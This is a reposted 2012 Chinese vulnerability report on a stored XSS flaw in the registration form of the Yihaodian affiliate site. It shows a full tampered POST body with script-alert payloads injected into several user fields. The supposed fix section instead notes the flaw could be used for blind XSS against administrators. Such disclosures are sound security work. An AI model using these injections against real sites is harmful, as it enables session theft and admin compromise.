频道栏目
首页 > 安全 > 网站安全 > 正文

一号店网站联盟未做任何过滤致存储型XSS产生

2012-10-08 10:11:38            作者:风萧萧
收藏   我要投稿

1.是这个站点啦!1号点网站联盟,貌似很牛B的样子
http://union.yihaodian.com


2.在填写基本信息这里可以插入任何特殊字符,不过客户端还是有一定的判断的,看图啦!


3.但是一切客户端的过滤都是纸老虎啦!


4.将上面post的参数值给改掉啦:
user.email=<script>alert(1)</script>&user.name=<script>alert(1)</script>&user.identityCard=<script>alert(2)</script>&user.mobile=<script>alert(3)</script>&user.phone=<script>alert(4)</script>&user.siteURl=<script>alert(5)</script>&user.siteName=<script>alert(6)</script>&user.trackerU=102826697&user.siteType=1
5.查看返回信息,就截四个图吧:

 



 


修复方案:

这个地方XSS似乎是有实际用途的吧,比如盲打管理员什么的!

相关TAG标签 联盟 网站
上一篇:Jsprun论坛函数型DOS漏洞2处
下一篇:艺龙多处存储型XSS 突破长度限制(原理利用及修复)
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站